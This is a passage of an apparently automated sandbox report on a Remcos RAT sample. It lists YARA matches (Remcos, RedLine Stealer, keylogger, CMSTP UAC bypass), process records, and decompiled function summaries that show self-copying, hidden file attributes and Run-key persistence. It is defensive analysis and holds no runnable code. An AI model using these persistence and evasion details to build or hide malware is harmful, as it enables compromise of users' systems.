00000018.00000003.1454164978.0000000002590000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	01:36:24
Start date:	11/01/2025
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 2268 -s 916
Imagebase:	0xac0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	01:36:28
Start date:	11/01/2025
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7796 -s 668
Imagebase:	0xac0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	01:36:28
Start date:	11/01/2025
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7828 -s 520
Imagebase:	0xac0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	03:02:23
Start date:	11/01/2025
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7796 -s 736
Imagebase:	0xac0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	03:02:25
Start date:	11/01/2025
Path:	C:\Users\user\AppData\Roaming\xenor\yavascript.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\xenor\yavascript.exe"
Imagebase:	0x400000
File size:	459'264 bytes
MD5 hash:	73666F4D35944F20B34C150B8D9DF538
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000023.00000002.1789635981.00000000009B1000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000023.00000002.1789796940.00000000009FD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000023.00000002.1788896834.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000023.00000002.1788896834.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000023.00000002.1788896834.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000023.00000002.1788896834.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Author: unknown Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000023.00000002.1788896834.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000023.00000002.1788896834.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Author: ditekSHen Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000023.00000003.1528824074.0000000002560000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000023.00000003.1528824074.0000000002560000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000023.00000003.1528824074.0000000002560000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000023.00000003.1528824074.0000000002560000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000023.00000003.1528824074.0000000002560000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000023.00000003.1528824074.0000000002560000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000023.00000002.1790357111.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000023.00000002.1790357111.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000023.00000002.1790357111.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000023.00000002.1790357111.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000023.00000002.1790357111.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	03:02:25
Start date:	11/01/2025
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7796 -s 676
Imagebase:	0xac0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	03:02:26
Start date:	11/01/2025
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7796 -s 752
Imagebase:	0xac0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	1.2%
Dynamic/Decrypted Code Coverage:	4.1%
Signature Coverage:	32.9%
Total number of Nodes:	686
Total number of Limit Nodes:	20

Executed Functions

Function 0041BCE3 Relevance: 115.6, APIs: 40, Strings: 26, Instructions: 140
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BCF8
GetProcAddress.KERNEL32(00000000), ref: 0041BD01
GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD18
GetProcAddress.KERNEL32(00000000), ref: 0041BD1B
LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD2D
GetProcAddress.KERNEL32(00000000), ref: 0041BD30
LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD41
GetProcAddress.KERNEL32(00000000), ref: 0041BD44
LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD55
GetProcAddress.KERNEL32(00000000), ref: 0041BD58
LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D783), ref: 0041BD65
GetProcAddress.KERNEL32(00000000), ref: 0041BD68
GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD75
GetProcAddress.KERNEL32(00000000), ref: 0041BD78
GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D783), ref: 0041BD85
GetProcAddress.KERNEL32(00000000), ref: 0041BD88
LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BD99
GetProcAddress.KERNEL32(00000000), ref: 0041BD9C
GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDA9
GetProcAddress.KERNEL32(00000000), ref: 0041BDAC
GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D783), ref: 0041BDBD
GetProcAddress.KERNEL32(00000000), ref: 0041BDC0
GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D783), ref: 0041BDD1
GetProcAddress.KERNEL32(00000000), ref: 0041BDD4
GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D783), ref: 0041BDE5
GetProcAddress.KERNEL32(00000000), ref: 0041BDE8
GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D783), ref: 0041BDF5
GetProcAddress.KERNEL32(00000000), ref: 0041BDF8
LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE06
GetProcAddress.KERNEL32(00000000), ref: 0041BE09
LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040D783), ref: 0041BE16
GetProcAddress.KERNEL32(00000000), ref: 0041BE19
GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040D783), ref: 0041BE2B
GetProcAddress.KERNEL32(00000000), ref: 0041BE2E
GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040D783), ref: 0041BE3B
GetProcAddress.KERNEL32(00000000), ref: 0041BE3E
LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040D783), ref: 0041BE50
GetProcAddress.KERNEL32(00000000), ref: 0041BE53
LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040D783), ref: 0041BE60
GetProcAddress.KERNEL32(00000000), ref: 0041BE63

Strings

GetExtendedTcpTable, xrefs: 0041BE40
user32, xrefs: 0041BD3C, 0041BDB3, 0041BDC7, 0041BDDB
EnumDisplayMonitors, xrefs: 0041BDC2
Shlwapi, xrefs: 0041BDFC
ntdll, xrefs: 0041BD50, 0041BE20, 0041BE2A, 0041BE3A
GetExtendedUdpTable, xrefs: 0041BE55
GetConsoleWindow, xrefs: 0041BE0B
Shell32, xrefs: 0041BD8F
NtUnmapViewOfSection, xrefs: 0041BD4B
SetProcessDEPPolicy, xrefs: 0041BD9E
IsWow64Process, xrefs: 0041BD6A
shcore, xrefs: 0041BD28
NtSuspendProcess, xrefs: 0041BE1B
GetComputerNameExW, xrefs: 0041BD7A
Kernel32, xrefs: 0041BD13
GetSystemTimes, xrefs: 0041BDEA
GlobalMemoryStatusEx, xrefs: 0041BD5A
SetProcessDpiAwareness, xrefs: 0041BD22, 0041BD27, 0041BD3B
NtResumeProcess, xrefs: 0041BE30
IsUserAnAdmin, xrefs: 0041BD8A
EnumDisplayDevicesW, xrefs: 0041BDAE
GetProcessImageFileNameW, xrefs: 0041BCED, 0041BCF2, 0041BD12
kernel32, xrefs: 0041BD5F, 0041BD64, 0041BD6F, 0041BD7F, 0041BDA3, 0041BDEF, 0041BE10
GetMonitorInfoW, xrefs: 0041BDD6
Iphlpapi, xrefs: 0041BE45, 0041BE4F, 0041BE5A
Psapi, xrefs: 0041BCF3

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: AddressProc$HandleLibraryLoadModule
String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
API String ID: 384173800-625181639
Opcode ID: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
Instruction ID: 894fbade80705e672e772900be83df88f70523cf1842e1027a1ce5ee2e2841b6
Opcode Fuzzy Hash: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
Instruction Fuzzy Hash: 2831EDA0E4031C7ADA107FB69C49E5B7E9CD944B953110827B508D3162FBBDA9809EEE

Function 0040D767 Relevance: 93.5, APIs: 12, Strings: 41, Instructions: 799
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BCF8
Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD01
Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD18
Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD1B
Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD2D
Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD30
Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD41
Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD44
Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD55
Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD58
Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D783), ref: 0041BD65
Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD68
Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD75
Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD78
Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D783), ref: 0041BD85
Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD88
Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BD99
Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD9C
Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDA9
Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDAC
Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D783), ref: 0041BDBD
Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDC0
Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D783), ref: 0041BDD1
Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDD4
Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D783), ref: 0041BDE5
Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDE8
Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D783), ref: 0041BDF5
Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDF8
Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE06

GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\2iH7rqx9rQ.exe,00000104), ref: 0040D790

Part of subcall function 0040FCBA: __EH_prolog.LIBCMT ref: 0040FCBF

Strings

licence, xrefs: 0040DD25
@CG, xrefs: 0040DC07
Exe, xrefs: 0040D8B6
Inj, xrefs: 0040D977, 0040D98E
XCG, xrefs: 0040D7FF
XCG, xrefs: 0040DD01
User, xrefs: 0040E038
BG, xrefs: 0040DCF6
Exe, xrefs: 0040D8B1
XCG, xrefs: 0040DEA3
Rmc-I7G983, xrefs: 0040D8A7, 0040D904
dCG, xrefs: 0040DFC4
0DG, xrefs: 0040D914
BG, xrefs: 0040DBC0
exepath, xrefs: 0040DC34, 0040DCDE
XCG, xrefs: 0040DB1D
Access Level: , xrefs: 0040E047
XCG, xrefs: 0040DAE9
license_code.txt, xrefs: 0040D7EF
Administrator, xrefs: 0040E02C
C:\Users\user\Desktop\2iH7rqx9rQ.exe, xrefs: 0040D788, 0040DBB1
XCG, xrefs: 0040DC4E
XCG, xrefs: 0040DF27
XCG, xrefs: 0040DEF4
XCG, xrefs: 0040DECB
del, xrefs: 0040E094, 0040E0F4
BG, xrefs: 0040DBF5
XCG, xrefs: 0040D838
XCG, xrefs: 0040DE78
XCG, xrefs: 0040DDBF
`=G, xrefs: 0040DF48
Remcos Agent initialized, xrefs: 0040DD8C
Software\, xrefs: 0040D865
@CG, xrefs: 0040DCBE
del, xrefs: 0040E078
BG, xrefs: 0040DC1C
XCG, xrefs: 0040DF67
XCG, xrefs: 0040DDD6
XCG, xrefs: 0040DB75
XCG, xrefs: 0040DF93
BG, xrefs: 0040DBB6

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
String ID: 0DG$@CG$@CG$Access Level: $Administrator$C:\Users\user\Desktop\2iH7rqx9rQ.exe$Exe$Exe$Inj$Remcos Agent initialized$Rmc-I7G983$Software\$User$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$`=G$dCG$del$del$exepath$licence$license_code.txt$BG$BG$BG$BG$BG
API String ID: 2830904901-3209671520
Opcode ID: a8ee8816d8bed25817fead358ba1a4cbb8bac14c840c6c38e28dc230a073cc04
Instruction ID: 4071723a11783d2da8da933f82134b9c6f3815e49c8d87d463163304bf45e319
Opcode Fuzzy Hash: a8ee8816d8bed25817fead358ba1a4cbb8bac14c840c6c38e28dc230a073cc04
Instruction Fuzzy Hash: 4032A360B043406ADA18B776DC57BBE269A8FC1748F04443FB8467B2E2DE7C9D45839E

Function 0040BC67 Relevance: 31.7, APIs: 12, Strings: 6, Instructions: 203
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_wcslen.LIBCMT ref: 0040BC75
CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040BC8E
CopyFileW.KERNEL32(C:\Users\user\Desktop\2iH7rqx9rQ.exe,00000000,00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040BD3E
_wcslen.LIBCMT ref: 0040BD54
CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040BDDC
CopyFileW.KERNEL32(C:\Users\user\Desktop\2iH7rqx9rQ.exe,00000000,00000000), ref: 0040BDF2
SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE31
_wcslen.LIBCMT ref: 0040BE34
SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE4B
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00474358,0000000E), ref: 0040BE9B
ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000001), ref: 0040BEB9
ExitProcess.KERNEL32 ref: 0040BED0

Strings

BG, xrefs: 0040BCB6
BG, xrefs: 0040BCE1
6, xrefs: 0040BD48
del, xrefs: 0040BE63
open, xrefs: 0040BEB2
C:\Users\user\Desktop\2iH7rqx9rQ.exe, xrefs: 0040BCFF, 0040BD04, 0040BD37, 0040BDEC, 0040BDF1, 0040BDF8, 0040BE59

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
String ID: 6$C:\Users\user\Desktop\2iH7rqx9rQ.exe$del$open$BG$BG
API String ID: 1579085052-2316342835
Opcode ID: 16529127e85918ffbe3c5fc9dfa5b6de4e550000c235b142a3b8812a3b1a8fcf
Instruction ID: b3868b96a5a73c1b880f625a38b4c220dd420420d05b0a2cc1e840e3cd02b35d
Opcode Fuzzy Hash: 16529127e85918ffbe3c5fc9dfa5b6de4e550000c235b142a3b8812a3b1a8fcf
Instruction Fuzzy Hash: D251B0212043406BD609B722EC52EBF77999F81719F10443FF985A66E2DF3CAD4582EE

Function 0040C89E Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 139
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0040CA04

Strings

ProgramData, xrefs: 0040C9C9
ProgramFiles, xrefs: 0040C9D8
WinDir, xrefs: 0040C905, 0040C927, 0040C979
SystemDrive, xrefs: 0040C8FB
\SysWOW64, xrefs: 0040C96A
UserProfile, xrefs: 0040C9C2
AppData, xrefs: 0040C9BB
\system32, xrefs: 0040C918
Temp, xrefs: 0040C8D0

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: LongNamePath
String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
API String ID: 82841172-425784914
Opcode ID: 9e5f4717f63d1797129c17e601dc587146b50d75548f7bffad1de6019ad0d9cf
Instruction ID: 51cedb133b73bca78a9fc1065318242b3d6e678e936cb09da4a185c9a299c852
Opcode Fuzzy Hash: 9e5f4717f63d1797129c17e601dc587146b50d75548f7bffad1de6019ad0d9cf
Instruction Fuzzy Hash: 39413A721442009BC214FB21DD96DAFB7A4AE90759F10063FB546720E2EE7CAA49C69F

Function 0247003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0247024D

Strings

cess, xrefs: 0247018D
kernel32.dll, xrefs: 0247008F, 02470095

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: 70afa96c0848c9c0fdeb42663e0eb32a74bf9eb8c3c80e1c0e0c7b8db5e94173
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: D7526975A01229DFDB64CF68C984BADBBB1BF09304F1480DAE55DAB351DB30AA85CF14

Function 0041A463 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 59
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,00000001,0040C914,WinDir,00000000,00000000), ref: 0041B16C
Part of subcall function 0041B15B: IsWow64Process.KERNEL32(00000000,?,00000001,0040C914,WinDir,00000000,00000000), ref: 0041B173

Part of subcall function 00412513: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00412537
Part of subcall function 00412513: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00412554
Part of subcall function 00412513: RegCloseKey.KERNEL32(?), ref: 0041255F

StrToIntA.SHLWAPI(00000000,0046BC48,?,00000000,00000000,00474358,00000003,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0041A4D9

Strings

SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 0041A477, 0041A481, 0041A4BF
(64 bit), xrefs: 0041A506, 0041A510
CurrentBuildNumber, xrefs: 0041A4BA
ProductName, xrefs: 0041A472
(32 bit), xrefs: 0041A501

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: Process$CloseCurrentOpenQueryValueWow64
String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
API String ID: 782494840-2070987746
Opcode ID: a55c638256b66cf5e177ec5e1d1255b3f99917f9e267a264aa353c179041220a
Instruction ID: 19977b185b3bcff34fa520d2ecc4782d624f476aadfe6515b429a208ce335d2f
Opcode Fuzzy Hash: a55c638256b66cf5e177ec5e1d1255b3f99917f9e267a264aa353c179041220a
Instruction Fuzzy Hash: EF11E9A060020166C704B365DCABDBF765ADB90304F50443FB906E31D2EB6C9E9683EE

Function 00412774 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegCreateKeyW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,?), ref: 0041277F
RegSetValueExW.KERNEL32(?,00000000,00000000,00000001,00000000,00000000,?,?,?,?,00000000,004742E0,771B37E0,?), ref: 004127AD
RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,004742E0,771B37E0,?,?,?,?,?,0040BE18,?,00000000), ref: 004127B8

Strings

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 0041277D

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: CloseCreateValue
String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
API String ID: 1818849710-1051519024
Opcode ID: c2c51a626fac7f572050981c99c94a90ee6ecaf2881fd6e36740fda265664054
Instruction ID: fff2d7bcc465bc574364a4979b4b77ba115ffea085319746951fe37a0eeb78e5
Opcode Fuzzy Hash: c2c51a626fac7f572050981c99c94a90ee6ecaf2881fd6e36740fda265664054
Instruction Fuzzy Hash: 9FF0CD31500218BBDF109FA0ED46EEF37ACAB40B50F104539F902A60A1E675DB14DAA4

Function 0040BED7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

